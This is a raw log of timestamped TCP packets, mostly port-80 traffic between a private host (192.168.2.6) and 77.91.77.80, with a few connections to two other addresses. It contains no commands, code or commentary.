Jul 2, 2024 00:05:08.223069906 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223088026 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.223117113 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.223242044 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223253012 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223263979 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223273993 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223284006 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223289967 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.223318100 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.223334074 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.223587036 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223597050 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223608017 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223617077 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223627090 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223637104 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.223664999 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.223905087 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223917961 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223932981 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.223963976 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.223979950 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.224083900 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224095106 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224104881 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224116087 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224133015 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.224164009 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.224211931 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224226952 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224236965 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224251986 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224262953 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224272966 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224283934 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224287987 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.224287987 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.224332094 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.224353075 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.224812031 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224853039 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224864006 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224869013 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.224889994 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.224914074 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.224916935 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224930048 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224965096 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.224966049 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.224994898 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.225006104 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.225009918 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.225018978 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.225047112 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.225070953 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.225131989 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.225142956 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.225147963 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.225157976 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.225174904 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.225174904 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.225209951 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.225228071 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.225673914 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.225732088 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.225734949 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.225748062 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.225779057 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.225809097 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.225821018 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.225831985 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.225841045 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.225861073 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.225894928 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.226116896 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.226129055 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.226159096 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.226166010 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.226178885 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.226200104 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.226284981 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.226313114 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.226324081 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.226334095 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.226345062 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.226353884 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.226365089 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.226377010 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.226377010 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.226423025 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.226453066 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.226464033 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.226475954 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.226500988 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.226536036 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.227155924 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.227171898 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.227181911 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.227212906 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.227224112 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.227289915 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.227299929 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.227309942 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.227320910 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.227355003 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.227355003 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.227389097 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.227405071 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.227416039 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.227426052 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.227435112 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.227444887 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.227453947 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.227453947 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.227454901 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.227463961 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.227483988 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.227521896 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.228034019 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.228044987 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.228056908 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.228091002 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.228091002 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.228137016 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.228172064 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.228183985 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.228193998 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.228203058 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.228225946 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.228279114 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.228451967 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.228462934 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.228471994 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.228492975 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.228503942 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.228503942 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.228516102 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.228526115 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.228528023 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.228538990 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.228600979 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.229235888 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229248047 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229259014 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229275942 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229285955 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229295969 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229300022 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.229307890 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229329109 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.229335070 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229357004 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.229357958 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229367971 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.229372978 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229409933 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.229409933 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.229681015 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229691982 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229702950 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229731083 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.229751110 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.229768991 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229779005 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229789019 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229804039 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229829073 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.229829073 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.229854107 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.229921103 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229931116 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229940891 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229950905 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229959965 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.229962111 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229974031 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229984999 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.229990959 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.230011940 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.230011940 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.230592966 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.230609894 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.230619907 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.230652094 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.230669022 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.230681896 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.230694056 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.230720043 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.230720043 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.230734110 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.230947971 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.230959892 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.230969906 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.230981112 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.230988026 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.230992079 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231004953 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.231014013 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231025934 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231035948 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231038094 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.231038094 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.231060028 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.231095076 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.231538057 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231558084 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231568098 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231616020 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.231616020 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.231635094 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231646061 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231657028 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231667042 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231683016 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.231705904 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.231707096 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231719017 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231729984 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231765985 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.231765985 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.231820107 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231832027 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231842995 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231853962 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.231858015 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.231901884 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.231901884 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.231988907 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.232213020 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.232517958 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.232530117 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.232542038 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.232574940 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.232593060 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.232598066 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.232605934 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.232616901 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.232650995 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.232657909 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.232666016 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.232670069 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.232681990 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.232692957 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.232712030 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.232732058 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.233228922 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.233242989 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.233259916 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.233270884 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.233282089 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.233290911 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.233290911 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.233294964 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.233308077 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.233324051 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.233341932 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.233421087 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.233433008 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.233443022 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.233453035 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.233469963 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.233479977 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.233490944 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.233515024 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.233515024 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.233515024 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.233526945 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.234107971 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.234189034 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.234194994 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.234209061 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.234247923 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.234247923 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.234330893 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.234342098 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.234349012 CEST	49727	443	192.168.2.6	162.159.133.233
Jul 2, 2024 00:05:08.234353065 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.234364033 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.234400988 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.234400988 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.234426975 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.234437943 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.234477043 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.234539032 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.234549999 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.234560966 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.234570980 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.234581947 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.234596968 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.234620094 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.234639883 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.235084057 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.235124111 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.235126972 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.235140085 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.235168934 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.235193968 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.235198021 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.235205889 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.235215902 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.235227108 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.235239029 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.235246897 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.235249996 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.235275030 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.235299110 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.235305071 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.235316992 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.235326052 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.235337019 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.235347033 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.235368013 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.235368013 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.235419989 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.236148119 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.236159086 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.236170053 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.236181021 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.236202955 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.236226082 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.236299038 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.236315966 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.236325026 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.236326933 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.236337900 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.236344099 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.236349106 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.236398935 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.236398935 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.236398935 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.236494064 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.236505985 CEST	80	49714	77.105.133.27	192.168.2.6
